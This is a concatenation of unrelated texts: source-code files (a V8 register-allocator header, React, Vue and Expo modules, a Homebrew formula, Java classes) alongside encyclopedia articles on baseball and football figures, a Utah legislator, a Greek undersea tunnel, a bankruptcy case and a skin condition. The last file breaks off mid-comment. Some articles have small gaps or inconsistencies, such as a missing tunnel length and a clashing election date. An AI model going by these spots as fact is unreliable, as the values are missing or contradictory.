TopLevelLiveRange* FixedLiveRangeFor(int index); TopLevelLiveRange* FixedFPLiveRangeFor(int index, MachineRepresentation rep); void MapPhiHint(InstructionOperand* operand, UsePosition* use_pos); void ResolvePhiHint(InstructionOperand* operand, UsePosition* use_pos); UsePosition* NewUsePosition(LifetimePosition pos, InstructionOperand* operand, void* hint, UsePositionHintType hint_type); UsePosition* NewUsePosition(LifetimePosition pos) { return NewUsePosition(pos, nullptr, nullptr, UsePositionHintType::kNone); } TopLevelLiveRange* LiveRangeFor(InstructionOperand* operand); // Helper methods for building intervals. UsePosition* Define(LifetimePosition position, InstructionOperand* operand, void* hint, UsePositionHintType hint_type); void Define(LifetimePosition position, InstructionOperand* operand) { Define(position, operand, nullptr, UsePositionHintType::kNone); } UsePosition* Use(LifetimePosition block_start, LifetimePosition position, InstructionOperand* operand, void* hint, UsePositionHintType hint_type); void Use(LifetimePosition block_start, LifetimePosition position, InstructionOperand* operand) { Use(block_start, position, operand, nullptr, UsePositionHintType::kNone); } RegisterAllocationData* const data_; ZoneMap<InstructionOperand*, UsePosition*> phi_hints_; DISALLOW_COPY_AND_ASSIGN(LiveRangeBuilder); }; class RegisterAllocator : public ZoneObject { public: RegisterAllocator(RegisterAllocationData* data, RegisterKind kind); protected: RegisterAllocationData* data() const { return data_; } InstructionSequence* code() const { return data()->code(); } RegisterKind mode() const { return mode_; } int num_registers() const { return num_registers_; } int num_allocatable_registers() const { return num_allocatable_registers_; } const int* allocatable_register_codes() const { return allocatable_register_codes_; } // Returns true iff. we must check float register aliasing. bool check_fp_aliasing() const { return check_fp_aliasing_; } // TODO(mtrofin): explain why splitting in gap START is always OK. LifetimePosition GetSplitPositionForInstruction(const LiveRange* range, int instruction_index); Zone* allocation_zone() const { return data()->allocation_zone(); } // Find the optimal split for ranges defined by a memory operand, e.g. // constants or function parameters passed on the stack. void SplitAndSpillRangesDefinedByMemoryOperand(); // Split the given range at the given position. // If range starts at or after the given position then the // original range is returned. // Otherwise returns the live range that starts at pos and contains // all uses from the original range that follow pos. Uses at pos will // still be owned by the original range after splitting. LiveRange* SplitRangeAt(LiveRange* range, LifetimePosition pos); bool CanProcessRange(LiveRange* range) const { return range != nullptr && !range->IsEmpty() && range->kind() == mode(); } // Split the given range in a position from the interval [start, end]. LiveRange* SplitBetween(LiveRange* range, LifetimePosition start, LifetimePosition end); // Find a lifetime position in the interval [start, end] which // is optimal for splitting: it is either header of the outermost // loop covered by this interval or the latest possible position. LifetimePosition FindOptimalSplitPos(LifetimePosition start, LifetimePosition end); void Spill(LiveRange* range); // If we are trying to spill a range inside the loop try to // hoist spill position out to the point just before the loop. LifetimePosition FindOptimalSpillingPos(LiveRange* range, LifetimePosition pos); const ZoneVector<TopLevelLiveRange*>& GetFixedRegisters() const; const char* RegisterName(int allocation_index) const; private: RegisterAllocationData* const data_; const RegisterKind mode_; const int num_registers_; int num_allocatable_registers_; const int* allocatable_register_codes_; bool check_fp_aliasing_; private: bool no_combining_; DISALLOW_COPY_AND_ASSIGN(RegisterAllocator); }; class LinearScanAllocator final : public RegisterAllocator { public: LinearScanAllocator(RegisterAllocationData* data, RegisterKind kind, Zone* local_zone); // Phase 4: compute register assignments. void AllocateRegisters(); private: ZoneVector<LiveRange*>& unhandled_live_ranges() { return unhandled_live_ranges_; } ZoneVector<LiveRange*>& active_live_ranges() { return active_live_ranges_; } ZoneVector<LiveRange*>& inactive_live_ranges() { return inactive_live_ranges_; } void SetLiveRangeAssignedRegister(LiveRange* range, int reg); // Helper methods for updating the life range lists. void AddToActive(LiveRange* range); void AddToInactive(LiveRange* range); void AddToUnhandledSorted(LiveRange* range); void AddToUnhandledUnsorted(LiveRange* range); void SortUnhandled(); bool UnhandledIsSorted(); void ActiveToHandled(LiveRange* range); void ActiveToInactive(LiveRange* range); void InactiveToHandled(LiveRange* range); void InactiveToActive(LiveRange* range); // Helper methods for allocating registers. bool TryReuseSpillForPhi(TopLevelLiveRange* range); bool TryAllocateFreeReg(LiveRange* range, const Vector<LifetimePosition>& free_until_pos); bool TryAllocatePreferredReg(LiveRange* range, const Vector<LifetimePosition>& free_until_pos); void GetFPRegisterSet(MachineRepresentation rep, int* num_regs, int* num_codes, const int** codes) const; void FindFreeRegistersForRange(LiveRange* range, Vector<LifetimePosition> free_until_pos); void ProcessCurrentRange(LiveRange* current); void AllocateBlockedReg(LiveRange* range); bool TrySplitAndSpillSplinter(LiveRange* range); // Spill the given life range after position pos. void SpillAfter(LiveRange* range, LifetimePosition pos); // Spill the given life range after position [start] and up to position [end]. void SpillBetween(LiveRange* range, LifetimePosition start, LifetimePosition end); // Spill the given life range after position [start] and up to position [end]. // Range is guaranteed to be spilled at least until position [until]. void SpillBetweenUntil(LiveRange* range, LifetimePosition start, LifetimePosition until, LifetimePosition end); void SplitAndSpillIntersecting(LiveRange* range); ZoneVector<LiveRange*> unhandled_live_ranges_; ZoneVector<LiveRange*> active_live_ranges_; ZoneVector<LiveRange*> inactive_live_ranges_; #ifdef DEBUG LifetimePosition allocation_finger_; #endif DISALLOW_COPY_AND_ASSIGN(LinearScanAllocator); }; class SpillSlotLocator final : public ZoneObject { public: explicit SpillSlotLocator(RegisterAllocationData* data); void LocateSpillSlots(); private: RegisterAllocationData* data() const { return data_; } RegisterAllocationData* const data_; DISALLOW_COPY_AND_ASSIGN(SpillSlotLocator); }; class OperandAssigner final : public ZoneObject { public: explicit OperandAssigner(RegisterAllocationData* data); // Phase 5: assign spill splots. void AssignSpillSlots(); // Phase 6: commit assignment. void CommitAssignment(); private: RegisterAllocationData* data() const { return data_; } RegisterAllocationData* const data_; DISALLOW_COPY_AND_ASSIGN(OperandAssigner); }; class ReferenceMapPopulator final : public ZoneObject { public: explicit ReferenceMapPopulator(RegisterAllocationData* data); // Phase 7: compute values for pointer maps. void PopulateReferenceMaps(); private: RegisterAllocationData* data() const { return data_; } bool SafePointsAreInOrder() const; RegisterAllocationData* const data_; DISALLOW_COPY_AND_ASSIGN(ReferenceMapPopulator); }; class LiveRangeBoundArray; // Insert moves of the form // // Operand(child_(k+1)) = Operand(child_k) // // where child_k and child_(k+1) are consecutive children of a range (so // child_k->next() == child_(k+1)), and Operand(...) refers to the // assigned operand, be it a register or a slot. class LiveRangeConnector final : public ZoneObject { public: explicit LiveRangeConnector(RegisterAllocationData* data); // Phase 8: reconnect split ranges with moves, when the control flow // between the ranges is trivial (no branches). void ConnectRanges(Zone* local_zone); // Phase 9: insert moves to connect ranges across basic blocks, when the // control flow between them cannot be trivially resolved, such as joining // branches. void ResolveControlFlow(Zone* local_zone); private: RegisterAllocationData* data() const { return data_; } InstructionSequence* code() const { return data()->code(); } Zone* code_zone() const { return code()->zone(); } bool CanEagerlyResolveControlFlow(const InstructionBlock* block) const; int ResolveControlFlow(const InstructionBlock* block, const InstructionOperand& cur_op, const InstructionBlock* pred, const InstructionOperand& pred_op); void CommitSpillsInDeferredBlocks(TopLevelLiveRange* range, LiveRangeBoundArray* array, Zone* temp_zone); RegisterAllocationData* const data_; DISALLOW_COPY_AND_ASSIGN(LiveRangeConnector); }; } // namespace compiler } // namespace internal } // namespace v8 #endif // V8_REGISTER_ALLOCATOR_H_ ```
Oliver Daniel Pickering (April 9, 1870 – January 20, 1952) was an American professional baseball outfielder and manager in a 30-year career that spanned from the 1892 Houston Mudcats to the 1922 Paducah Indians. He played for a number of Major League Baseball teams from 1896 to 1908: the Louisville Colonels, Cleveland Spiders, Cleveland Blues, Philadelphia Athletics, St. Louis Browns, and Washington Senators. Career Pickering is credited with giving baseball the term "Texas leaguer", a pejorative slang for a weak pop fly that lands unimpressively between an infielder and an outfielder for a base hit. According to the April 21, 1906, edition of The Sporting Life, John McCloskey, founder of the Texas League and then-manager of the Houston Mudcats – who would later go onto manage the St. Louis Cardinals – signed 22-year-old Pickering to play center field on the morning of May 21, 1892. That afternoon, Pickering turned in one of the most remarkable performances in the history of the Texas League, stringing together seven consecutive singles in one game, each a soft, looping fly ball that fell in no-man's land between either the first baseman and right fielder or the third baseman and left fielder. News of Pickering's feat spread quickly throughout the nation, and the term "Texas leaguer" became ingrained in the baseball lexicon. Pickering's seven consecutive singles in a game still stands as a Texas League record. On April 24, 1901, Pickering was the leadoff batter for the Cleveland Blues (precursor to the Indians), which was the visiting team facing the Chicago White Sox in the first game ever played in the American League. The three other games scheduled that day were rained out. Thus, Pickering was the first person to bat in the American League. According to The Cleveland Indians Encyclopedia, based on an account from the Cleveland Plains-Dealer, this transpired: "The date was April 24, in Chicago's White Sox park (a.k.a. South Side Park), when Ollie Pickering stepped to the plate for the Cleveland Blues. Pickering, an outfielder, hit the second pitch from Chicago White Sox right-hander Roy Patterson to center field. William Hoy, a deaf-mute who was cruelly nicknamed Dummy, caught the routine fly, and with that the American League was officially underway." Chicago went on to win, 8–2. On May 5, 1904, Pickering, playing for the Philadelphia Athletics, twice came close to spoiling Cy Young's perfect game for the Boston Americans, the first ever thrown in the American League. Of Pickering's performance, author Michael Coffey wrote: "In the fourth ... Ollie Pickering looped one into the no-man's land beyond the second-base bag – in a bid for the kind of hit he made famous – only to have center fielder Chick Stahl make a fine running catch. Pickering was almost the spoiler again, with one down in the top of the sixth, when he tapped a slow roller to short, but Freddy Parent charged the ball and nipped Pickering by half a step." Pickering played and managed in the minor leagues into his 50s. His playing days ended in 1920 at the age of 50 with the Redfield Reds. He last managed with the Paducah Indians in 1922. Upon his retirement from the game, Pickering became an umpire and later retired in Vincennes, Indiana. Pickering's great-great-grandson is National Football League side judge Jimmy Russell. References External links 1870 births 1952 deaths 19th-century baseball players Major League Baseball outfielders Louisville Colonels players Cleveland Spiders players Cleveland Blues (1901) players Cleveland Bronchos players Philadelphia Athletics players St. Louis Browns players Washington Senators (1901–1960) players Minor league baseball managers Columbus Senators players Minneapolis Millers (baseball) players Louisville Colonels (minor league) players Vincennes Hoosiers players Paducah Polecats players Omaha Rourkes players Terre Haute Terre-iers players Vincennes Alices players Henderson Hens players Owensboro Distillers players St. Boniface Saints (baseball) players Redfield Reds players Baseball players from Richland County, Illinois People from Olney, Illinois People from Vincennes, Indiana Houston Magnolias players
```xml import { useField } from 'formik'; import { FeatureId } from '@/react/portainer/feature-flags/enums'; import { isBE } from '@/react/portainer/feature-flags/feature-flags.service'; import { FormControl } from '@@/form-components/FormControl'; import { SwitchField } from '@@/form-components/SwitchField'; import { Input } from '@@/form-components/Input'; import { useToggledValue } from '../useToggledValue'; export function KubeNoteMinimumCharacters() { const [{ value }, { error }, { setValue }] = useField<number>( 'globalDeploymentOptions.minApplicationNoteLength' ); const [isEnabled, setIsEnabled] = useToggledValue( 'globalDeploymentOptions.minApplicationNoteLength', 'globalDeploymentOptions.requireNoteOnApplications' ); return ( <> <div className="form-group"> <div className="col-sm-12"> <SwitchField label="Require a note on applications" data-cy="kube-settings-require-note-on-applications-switch" checked={isEnabled} name="toggle_requireNoteOnApplications" onChange={(value) => setIsEnabled(value)} featureId={FeatureId.K8S_REQUIRE_NOTE_ON_APPLICATIONS} labelClass="col-sm-3 col-lg-2" tooltip={`${ isBE ? '' : 'BE allows entry of notes in Add/Edit application. ' }Using this will enforce entry of a note in Add/Edit application (and prevent complete clearing of it in Application details).`} /> </div> </div> {isEnabled && ( <FormControl label={ <span className="pl-4"> Minimum number of characters note must have </span> } errors={error} > <Input name="minNoteLength" data-cy="min-note-length-input" type="number" placeholder="50" min="1" max="9999" value={value} onChange={(e) => setValue(e.target.valueAsNumber)} className="w-1/4" /> </FormControl> )} </> ); } ```
```vue <template> <form class="form vue-form" @submit.prevent="submit" > <section class="card mb-3" role="region" > <div class="card-header text-bg-primary"> <h2 class="card-title"> {{ $gettext('Branding Settings') }} </h2> </div> <div v-show="error != null" class="alert alert-danger" > {{ error }} </div> <loading :loading="isLoading"> <div class="card-body"> <div class="row g-3"> <form-group-field id="form_edit_offline_text" class="col-md-6" :field="v$.offline_text" :label="$gettext('Station Offline Display Text')" :description="$gettext('This will be shown on public player pages if the station is offline. Leave blank to default to a localized version of &quot;%{message}&quot;.', {message: $gettext('Station Offline')})" /> <form-group-field id="form_edit_default_album_art_url" class="col-md-6" :field="v$.default_album_art_url" :label="$gettext('Default Album Art URL')" :description="$gettext('If a song has no album art, this URL will be listed instead. Leave blank to use the standard placeholder art.')" /> <form-group-field id="edit_form_public_custom_css" class="col-md-12" :field="v$.public_custom_css" :label="$gettext('Custom CSS for Public Pages')" :description="$gettext('This CSS will be applied to the station public pages.')" > <template #default="slotProps"> <codemirror-textarea :id="slotProps.id" v-model="slotProps.field.$model" mode="css" /> </template> </form-group-field> <form-group-field id="edit_form_public_custom_js" class="col-md-12" :field="v$.public_custom_js" :label="$gettext('Custom JS for Public Pages')" :description="$gettext('This javascript code will be applied to the station public pages.')" > <template #default="slotProps"> <codemirror-textarea :id="slotProps.id" v-model="slotProps.field.$model" mode="javascript" /> </template> </form-group-field> </div> <button class="btn btn-primary mt-3" type="submit" > {{ $gettext('Save Changes') }} </button> </div> </loading> </section> </form> </template> <script setup lang="ts"> import CodemirrorTextarea from "~/components/Common/CodemirrorTextarea.vue"; import FormGroupField from "~/components/Form/FormGroupField.vue"; import {onMounted, ref} from "vue"; import {useAxios} from "~/vendor/axios"; import mergeExisting from "~/functions/mergeExisting"; import {useNotify} from "~/functions/useNotify"; import {useTranslate} from "~/vendor/gettext"; import {useVuelidateOnForm} from "~/functions/useVuelidateOnForm"; import Loading from "~/components/Common/Loading.vue"; const props = defineProps({ profileEditUrl: { type: String, required: true }, }); const isLoading = ref(true); const error = ref(null); const {form, resetForm, v$, ifValid} = useVuelidateOnForm( { default_album_art_url: {}, public_custom_css: {}, public_custom_js: {}, offline_text: {} }, { default_album_art_url: '', public_custom_css: '', public_custom_js: '', offline_text: '' } ); const {$gettext} = useTranslate(); const {axios} = useAxios(); const populateForm = (data) => { form.value = mergeExisting(form.value, data); }; const relist = () => { resetForm(); isLoading.value = true; axios.get(props.profileEditUrl).then((resp) => { populateForm(resp.data.branding_config); isLoading.value = false; }); } onMounted(relist); const {notifySuccess} = useNotify(); const submit = () => { ifValid(() => { axios({ method: 'PUT', url: props.profileEditUrl, data: { branding_config: form.value } }).then(() => { notifySuccess(); relist(); }); }); } </script> ```
Jennifer M. "Jen" Seelig (born 1969/1970) is a former Democratic member of the Utah State House of Representatives, who represented the 23rd District from 2006 to 2014. She lives in Salt Lake City. She is currently working in the Salt Lake City Mayor's Office as the Director of Community Relations. Early life and education Seelig has a bachelor's degree from the University of Louisville and an MPA from the University of Utah. Political career Representative Seelig was elected November 6, 2012. During the 2014 General Session, she served as the Minority Leader for the House Democrats. She also served on the House Law Enforcement and Criminal Justice Committee, and the House Political Subdivisions Committee. 2014 Sponsored Legislation Representative Seelig did not floor sponsor any legislation during 2014. Pivotal Legislation During the 2014 General Session, Representative Seelig ran a few bills that are considered "pivotal". HB 90, the Commission on Women in the Economy, received much attention from the media and from Utah citizens. HB 157, Rape Kit Processing Amendments, passed, but was open to much debate on the floor. References External links Utah House of Representatives - Jennifer M. Seelig 'official UT House profile Project Vote Smart - Jennifer M. 'Jen' Seelig profileFollow the Money'' - Jen Seelig 2006 campaign contributions Information on bills Living people Democratic Party members of the Utah House of Representatives University of Utah alumni University of Louisville alumni Women state legislators in Utah Politicians from Salt Lake City 21st-century American politicians 21st-century American women politicians Year of birth missing (living people) 1960s births
The Underwater Road Tunnel Salamina island - Perama is a planned sub-sea road tunnel in the Attica region of Greece, which will provide a direct road link between the island of Salamis of Islands Regional unit in the Saronic Gulf and the port city of Perama in Piraeus Regional Unit, on the east coast of the Saronic Gulf. In whole, the project includes the construction of an underwater road tunnel about 1 km long, the construction of a new road section from Schistos Avenue to the tunnel's entrance in Perama, as well as two new interchanges connecting the adjacent road network in Salamis and Perama. The project has been tendered through the procedure of Competitive Dialogue and is currently at the second stage (stage B) of the tender from which the contractor (concessionaire) will be selected. Three contenders currently participate in the tender: Metka, Terna and a consortium between Vinci Concessions – Vinci Highways – Aktor Concessions. Its cost is estimated at €450 million and its construction period at around four years. When completed, the total length of the new road axis will be about 17 km and the undersea link will significantly reduce the travel time between Salamis and the mainland from about 40 minutes to just 4 minutes. History The first plans for an underwater road link between Salamis Island and the Greek mainland took place more than 20 years ago and the first tender was planned under the ministry of Stefanos Manos in the early 1990s. In October 1995 the project was cancelled by decision of Costas Laliotis and since then the planning of a new road link has been constantly coming to the fore but there has been no consensus for its construction, mainly due to opposition from the joint ventures that operate the ferry services. The Paloukia (at Salamis) - Perama ferry line is the busiest one in Greece in terms of traffic volume, handling 9.8 million passengers and 4 million vehicles as of 2009. In 2012, the then Minister of Infrastructure and Transport Makis Voridis, decided to hold a tender to award the concession of the contract, but the process was continuously extended. After numerous successive extensions, the tender finally began and the project was bidded out on March 15, 2016, after the completion of the Expression of Interest (EoI) phase. The project has been tendered through the procedure of Competitive Dialogue in which opinions, proposals and comments are submitted by the participants, the Ministry of Infrastructure and Transport and the local administrative bodies. On November 17, 2016, stage B of the tender began. The three groups that currently participate in this phase are: Metka, Terna and the consortium between Vinci Concessions - Vinci Highways - Aktor Concessions. On January 30, 2018, the Greek Council of State rejected all the allegations made by the Salamis Environmental Group "PERIVOS" as unfounded. The group had appealed to the council and asked for the decision by the Minister of Infrastructure to hold the tender to be annulled as unconstitutional and illegal. In September 2018, the Environmental Impact Assessment (EIA) of the project began. By the spring of 2020, the Competitive Dialogue procedure had been completed and approval had been obtained by the Archaeological Documentation Service and the Hellenic Navy General Staff. The next step is the completion of the EIA and its approval by the Ministry of the Environment and Energy, and finally the start of the third and final stage of the tender, which is the evaluation of the technical and financial bids and the selection of the contractor (concessionaire) of the project. Description The main project concerns the construction of an underwater road tunnel based on the seabed, with 2 lanes in each direction and with a length of about 400 meters (total length of about 1.1 km including the access roads in both sides), which will start from a new interchange in Perama and end in another interchange on the eastern side of the Salamis Island, in its main port of Paloukia. The project also includes the construction of new road sections bypassing the towns of Perama and Salamina. In particular, a new road section will be constructed near the existing Schistos-Skaramagkas Avenue and will extend up to the port of Perama on the Saronic Gulf's eastern coast, where an interchange will be constructed connecting the adjacent road network. From there, the road will gradually submerge beneath the sea with the construction of the underwater road tunnel. The tunnel will then emerge on the small uninhabited island of Agios Georgios and the road will proceed up to the entrance of the Salamis Naval Base in the northeastern part of Salamis Island. In the village of Paloukia, a new junction will be constructed and the road will then proceed north of Paloukia, up to another interchange that will be constructed north of the town of Salamina, connecting all the adjacent roads. The total length of the new road axis that will be constructed will be about . References Undersea tunnels in Europe Road tunnels in Greece Proposed undersea tunnels in Europe Saronic Gulf Salamis Island
Travelers Casualty & Surety Co. of America v. Pacific Gas & Elec. Co., 549 U.S. 443 (2007), was a United States Supreme Court case about attorney's fees in bankruptcy cases. Justice Samuel Alito wrote the opinion for a unanimous court. Background Before they declared bankruptcy, Pacific Gas & Electric Company (PG&E) purchased surety bonds from Travelers, an insurance company. The bonds obliged Travelers to settle debts PG&E couldn't repay. When PG&E filed a voluntary Chapter 11 bankruptcy petition on April 6, 2001 as a result of the California electricity crisis, Travelers hired attorneys to protect its interests. California law mandated that PG&E cover all attorney fees incurred by Travelers during state court proceedings. The litigation later moved to federal court, where PG&E refused to pay for Travelers' federal court expenses, claiming they were only responsible for fees incurred during state court proceedings. Procedural history The bankruptcy court denied Travelers' request for reimbursement because the federal precedents in the Ninth Circuit held that only federal laws could ensure payment for federal litigation. PG&E was only under contractual and legal obligation to pay for state-court attorney fees, not federal-court fees. The District Court and the Ninth Circuit denied Travelers' claim on the same grounds. Travelers appealed to the Supreme Court, and the Supreme Court granted certiorari, seeking to resolve an inconsistency among the circuit courts. Decision Issue Can an unsecured creditor in a bankruptcy case collect attorneys' fees authorized by a contract and incurred in postpetition litigation where such a contractual obligation is guaranteed under a state law? Opinion Justice Alito issued the Court's unanimous opinion, holding that "an otherwise enforceable contract allocating attorney’s fees ... is allowable in bankruptcy except where the Bankruptcy Code provides otherwise." Because the Bankruptcy Code "says nothing about unsecured claims for contractual attorney's fees incurred while litigating issues of bankruptcy law," the Court could "presume that claims enforceable under applicable state law will be allowed in bankruptcy unless they are expressly disallowed." The Court found that none of the nine exemptions waiving contractual obligation to reimburse attorney fees set forth in 11 U.S.C. § 502(b) applied to Travelers, and therefore nothing undermined the debtor's contractual or state-law obligation to pay. The idea that state-law or contractual claims for attorneys' fees are unenforceable in federal bankruptcy proceedings, Alito wrote, "finds no support in the Bankruptcy Code, either in §502 or elsewhere." See also Baylis v. Travelers' Insurance Company (1885) Pacific Gas & Electric v. Public Utilities Commission (1986) Pacific Gas & Electric Co. v. State Energy Resources Conservation and Development Commission (1983) External links United States Supreme Court cases 2007 in United States case law The Travelers Companies Pacific Gas and Electric Company United States bankruptcy case law United States Supreme Court cases of the Roberts Court
The Koebner phenomenon or Köbner phenomenon (, ), also called the Koebner response or the isomorphic response, attributed to Heinrich Köbner, is the appearance of skin lesions on lines of trauma. The Koebner phenomenon may result from either a linear exposure or irritation. Conditions demonstrating linear lesions after a linear exposure to a causative agent include: molluscum contagiosum, warts and toxicodendron dermatitis (a dermatitis caused by a genus of plants including poison ivy). Warts and molluscum contagiosum lesions can be spread in linear patterns by self-scratching ("auto-inoculation"). Toxicodendron dermatitis lesions are often linear from brushing up against the plant. Causes of the Koebner phenomenon that are secondary to scratching rather than an infective or chemical cause include vitiligo, psoriasis, lichen planus, lichen nitidus, pityriasis rubra pilaris, and keratosis follicularis (Darier disease). Definition The Koebner phenomenon describes skin lesions which appear at the site of injury. It is seen in: Psoriasis Pityriasis rubra pilaris Lichen planus Flat warts Lichen nitidus Vitiligo Lichen sclerosus Elastosis perforans serpiginosa Kaposi sarcoma Necrobiosis lipoidica Lupus Juvenile Idiopathic Arthritis Still disease Cutaneous leishmaniasis Post kala azar dermal leishmaniasis Eruptive xanthomas A similar response occurs in pyoderma gangrenosum and Behcet's syndrome, and is referred to as pathergy. Rarely Koebner phenomenon has been reported as a mechanism of acute myeloid leukemia dissemination. Warts and molluscum contagiosum are often listed as causing a Koebner reaction, but this is by direct inoculation of viral particles. The linear arrangement of skin lesions in the Koebner phenomenon can be contrasted to both lines of Blaschko and dermatomal distributions. Blaschko lines follow embryotic cell migration patterns and are seen in some mosaic genetic disorders such as incontinentia pigmenti and pigment mosaicism. Dermatomal distributions are lines on the skin surface following the distribution of spinal nerve roots. The rash caused by herpes zoster (Shingles) follows such dermatomal lines. History The Koebner phenomenon was named after the rather eccentric but renowned German dermatologist Heinrich Koebner (1838–1904). Koebner is best known for his work in mycology. His intense nature is illustrated by the following: in a medical meeting, he proudly exhibited on his arms and chest three different fungus infections, which he had self-inoculated, in order to prove the infectiousness of the organisms he was studying. The Koebner phenomenon is the generalized term applied to his discovery that on psoriasis patients, new lesions often appear along lines of trauma. See also Renbök phenomenon References Sources Crissey JT, Parish LC, Holubar KH. Historical Atlas of Dermatology and Dermatologists. New York: The Parthenon Publishing Group, 2002. Paller A, Mancini A. Hurwitz Clinical Pediatric Dermatology. Philadelphia: Elsevier Saunders, 2002. Dermatologic signs
```javascript "use strict"; /** * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ Object.defineProperty(exports, "__esModule", { value: true }); exports.getContext = exports.rerender = exports.runWithRenderStore = exports.defineEntries = void 0; function defineEntries(renderEntries, getBuildConfig, getSsrConfig) { return { renderEntries, getBuildConfig, getSsrConfig }; } exports.defineEntries = defineEntries; // TODO(EvanBacon): This can leak between platforms and runs. // We need to share this module between the server action module and the renderer module, per platform, and invalidate on refreshes. function getGlobalCacheForPlatform() { if (!globalThis.__EXPO_RSC_CACHE__) { globalThis.__EXPO_RSC_CACHE__ = new Map(); } if (globalThis.__EXPO_RSC_CACHE__.has(process.env.EXPO_OS)) { return globalThis.__EXPO_RSC_CACHE__.get(process.env.EXPO_OS); } try { const { AsyncLocalStorage } = require('node:async_hooks'); // @ts-expect-error: This is a Node.js feature. const serverCache = new AsyncLocalStorage(); globalThis.__EXPO_RSC_CACHE__.set(process.env.EXPO_OS, serverCache); return serverCache; } catch (error) { console.log('[RSC]: Failed to create cache:', error); // Fallback to a simple in-memory cache. const cache = new Map(); const serverCache = { getStore: () => cache.get('store'), run: (store, fn) => { cache.set('store', store); try { return fn(); } finally { cache.delete('store'); } }, }; globalThis.__EXPO_RSC_CACHE__.set(process.env.EXPO_OS, serverCache); return serverCache; } } let previousRenderStore; let currentRenderStore; const renderStorage = getGlobalCacheForPlatform(); /** * This is an internal function and not for public use. */ const runWithRenderStore = (renderStore, fn) => { if (renderStorage) { return renderStorage.run(renderStore, fn); } previousRenderStore = currentRenderStore; currentRenderStore = renderStore; try { return fn(); } finally { currentRenderStore = previousRenderStore; } }; exports.runWithRenderStore = runWithRenderStore; function rerender(input, searchParams) { const renderStore = renderStorage?.getStore() ?? currentRenderStore; if (!renderStore) { throw new Error('Render store is not available'); } renderStore.rerender(input, searchParams); } exports.rerender = rerender; function getContext() { const renderStore = renderStorage?.getStore() ?? currentRenderStore; if (!renderStore) { throw new Error('Render store is not available'); } return renderStore.context; } exports.getContext = getContext; //# sourceMappingURL=server.js.map ```
```ruby class Pedump < Formula desc "Dump Windows PE files using Ruby" homepage "path_to_url" url "path_to_url" sha256 your_sha256_hash license "MIT" bottle do sha256 cellar: :any_skip_relocation, arm64_sonoma: your_sha256_hash sha256 cellar: :any_skip_relocation, arm64_ventura: your_sha256_hash sha256 cellar: :any_skip_relocation, arm64_monterey: your_sha256_hash sha256 cellar: :any_skip_relocation, sonoma: your_sha256_hash sha256 cellar: :any_skip_relocation, ventura: your_sha256_hash sha256 cellar: :any_skip_relocation, monterey: your_sha256_hash sha256 cellar: :any_skip_relocation, x86_64_linux: your_sha256_hash end depends_on "ruby" conflicts_with "mono", because: "both install `pedump` binaries" def install ENV["GEM_HOME"] = libexec system "bundle", "config", "set", "without", "development" system "bundle", "install" system "gem", "build", "#{name}.gemspec" system "gem", "install", "--ignore-dependencies", "#{name}-#{version}.gem" bin.install libexec/"bin/#{name}" bin.env_script_all_files(libexec/"bin", GEM_HOME: ENV["GEM_HOME"]) end test do assert_match version.to_s, shell_output("#{bin}/pedump --version") resource "notepad.exe" do url "path_to_url" sha256 your_sha256_hash end resource("notepad.exe").stage testpath assert_match "2008-04-13 18:35:51", shell_output("#{bin}/pedump --pe notepad.exe") end end ```
J. Huber "Hube" Wagner (January 5, 1891 – March 1979) was an American football player who played college football at the University of Pittsburgh from 1910 until 1913 before becoming a prominent surgeon in Pittsburgh, Pennsylvania. Formative years While still a student at Monaca High School, Wagner was hailed by the media for being one of Pennsylvania's most versatile football players. He then made the varsity squad as a freshman at the University of Pittsburgh, where he was an end player. That season Pitt posted a 9–0 record. Although Wagner was primarily used as an end at Pitt moving forward, Pitt's coach Joe Thompson developed him into a utility player, using him at every other position except quarterback. In 1913, Wagner captained the Pitt team and received All-American honors. In 1915, he was recruited by Jack Cusack, the manager of the Canton Bulldogs to play for the Bulldogs against their rivals the Massillon Tigers. Medical career After graduation, Wagner became a prominent surgeon in Pittsburgh, treating patients until his retirement in 1975. He also served twelve years on the University of Pittsburgh's board of trustees. Awards and other honors Wagner was elected to the College Football Hall of Fame in 1973. References Beaver County Sportsman's Hall of Fame 1891 births 1979 deaths American football ends Canton Bulldogs (Ohio League) players Pittsburgh Panthers football players College Football Hall of Fame inductees People from Monaca, Pennsylvania Players of American football from Beaver County, Pennsylvania Physicians from Pennsylvania
```java /* * * * path_to_url * * Unless required by applicable law or agreed to in writing, * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * specific language governing permissions and limitations */ package io.ballerina.projects.internal.bala; /** * {@code BalaJson} Model for Bala JSON file. * * @since 2.0.0 */ public class BalaJson { private String bala_version = "2.0.0"; private String built_by = "WSO2"; public String getBala_version() { return bala_version; } public void setBala_version(String bala_version) { this.bala_version = bala_version; } public String getBuilt_by() { return built_by; } public void setBuilt_by(String built_by) { this.built_by = built_by; } } ```
```java /* * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package com.oracle.svm.core.sampler; import org.graalvm.nativeimage.StackValue; import org.graalvm.nativeimage.c.function.CodePointer; import org.graalvm.nativeimage.c.type.CIntPointer; import org.graalvm.word.Pointer; import org.graalvm.word.WordFactory; import com.oracle.svm.core.Uninterruptible; import com.oracle.svm.core.code.CodeInfo; import com.oracle.svm.core.code.CodeInfoAccess; import com.oracle.svm.core.code.CodeInfoDecoder; import com.oracle.svm.core.code.CodeInfoTable; import com.oracle.svm.core.code.FrameInfoQueryResult; import com.oracle.svm.core.code.UntetheredCodeInfo; import com.oracle.svm.core.jfr.JfrBuffer; import com.oracle.svm.core.jfr.JfrFrameType; import com.oracle.svm.core.jfr.JfrNativeEventWriter; import com.oracle.svm.core.jfr.JfrNativeEventWriterData; import com.oracle.svm.core.jfr.JfrNativeEventWriterDataAccess; import com.oracle.svm.core.jfr.JfrStackTraceRepository; import com.oracle.svm.core.jfr.JfrThreadLocal; import com.oracle.svm.core.jfr.SubstrateJVM; import com.oracle.svm.core.jfr.events.ExecutionSampleEvent; import com.oracle.svm.core.util.VMError; /** * A concrete implementation of {@link SamplerStackTraceSerializer} designed for 